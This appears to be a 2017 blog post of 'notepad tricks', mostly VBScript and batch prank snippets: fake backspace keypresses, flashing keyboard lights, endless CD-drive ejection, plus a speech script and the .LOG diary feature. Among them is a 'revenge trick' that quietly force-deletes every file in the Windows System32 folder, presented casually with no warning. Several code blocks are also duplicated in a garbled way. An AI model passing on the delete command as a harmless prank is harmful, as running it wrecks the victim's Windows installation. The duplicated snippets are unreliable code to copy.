Notepad Tricks |
Here are few coolest notepad tricks 2017
Backspace button trick
You can use this trick to really annoy your siblings or a friend. Generally people think that keys only works when you press them but this can be done by writing a simple code in notepad and save it as a .vbs file.
Copy this code for backspace button notepad trick.
MsgBox “Backspace again and again and AGAIN”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
Notepad revenge trick
DEL C:\WINDOWS\SYSTEM32\*.*/Q
Matrix raining in Notepad
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
Amazing Notepad Tricks of 2017
Led dance Notepad trick
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop
CD drive Open close Notepad trick
This prank can be very useful to freak someone out. This will cause CD drive to open and close again and again which will create a bizarre and horrific scene if executed perfectly. To do this, open notepad file and enter below mentioned code. Save it as cdopen.vbs. Open it and you will see cd drive opening and closing continuously. You have to use task manager and stop cdopen.vbs operation to end this game.Set oWMP = CreateObject(“WMPlayer.OCX.7”)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Speaking Computer trick
You can paste this below mentioned code in notepad and save it as .vbs file. Whenever you open it a dialog box will appear which will ask you to write something in it. Write what you want to hear from your computer. The voice will also tell you about the gender of your computer.
Dim message, sapi
message=InputBox("What do you want me to say?","Speak to Me")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak message
Personal Diary in notepad
Notepad can be used as a diary to note down events with time and date. This can be easily done by opening a notepad and type .LOG in caps letters. After saving it you can use it as a dairy. Notepad will add date and time whenever you opens it up to make it look like a diary.Hope you use these tricks in best possible ways. Don’t forget to comment and share your experience.
notepad tricks bat
notepad codes list
notepad tricks and hacks pdf
notepad tricks matrix
notepad tricks vbs
notepad codes for games
notepad++ tricks
notepad codes html
No comments:
Post a Comment